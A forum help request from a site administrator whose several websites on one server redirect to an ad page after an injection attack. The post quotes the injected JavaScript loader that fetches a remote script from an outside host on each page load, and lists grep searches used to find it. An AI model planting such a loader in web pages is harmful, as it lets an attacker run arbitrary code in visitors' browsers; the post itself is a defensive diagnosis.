From last few days, my sites have been come across malicious attack. When I open a site http://site1.com it first goes to redirected on another page (possibly an ad page).
In chrome browser when I try to diagnose the problem through console (F12), I found it shows me a strange error. "Failed to load resource: net::ERR_NAME_NOT_RESOLVED" and url is - https://js.localstorage.tk/s.js?crt=new. In further investigation I found that it injects following script on every page load of every website on that particular server. (Not one site but 3-4 sites have been infected with same attack on same server).
var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?crt=new"; document.head.appendChild(z);
I have also tried to find this code snippet in hosted file systems of infected websites, using various "grep" commands as below but i couldn't found anything.
grep -rwn /var/www/ -e 'js.localstorage.tk'
grep -rwn /var/www/ -e 'var z'
grep -rwn /var/www/ -e 'z.type'
grep -rwn /var/www/ -e 'z.src'
grep -rwn /var/www/ -e 'crt=new'
But no clue of malicious injected script. Same result in DB investigation.
When I access my site through LAN without internet then the same error with some weird URL :
GET https://js.localstorage.tk/s.js?crt=new net::ERR_NAME_NOT_RESOLVED debugger:///VM359:1
And worst thing is that now google has listed my sites into "Dangerous" list and it show warning "Deceptive site ahead" with dark red background.
Any help...!!!
find code with this command
grep -rwn /var/www/ -e 'eval(String.fromCharCode'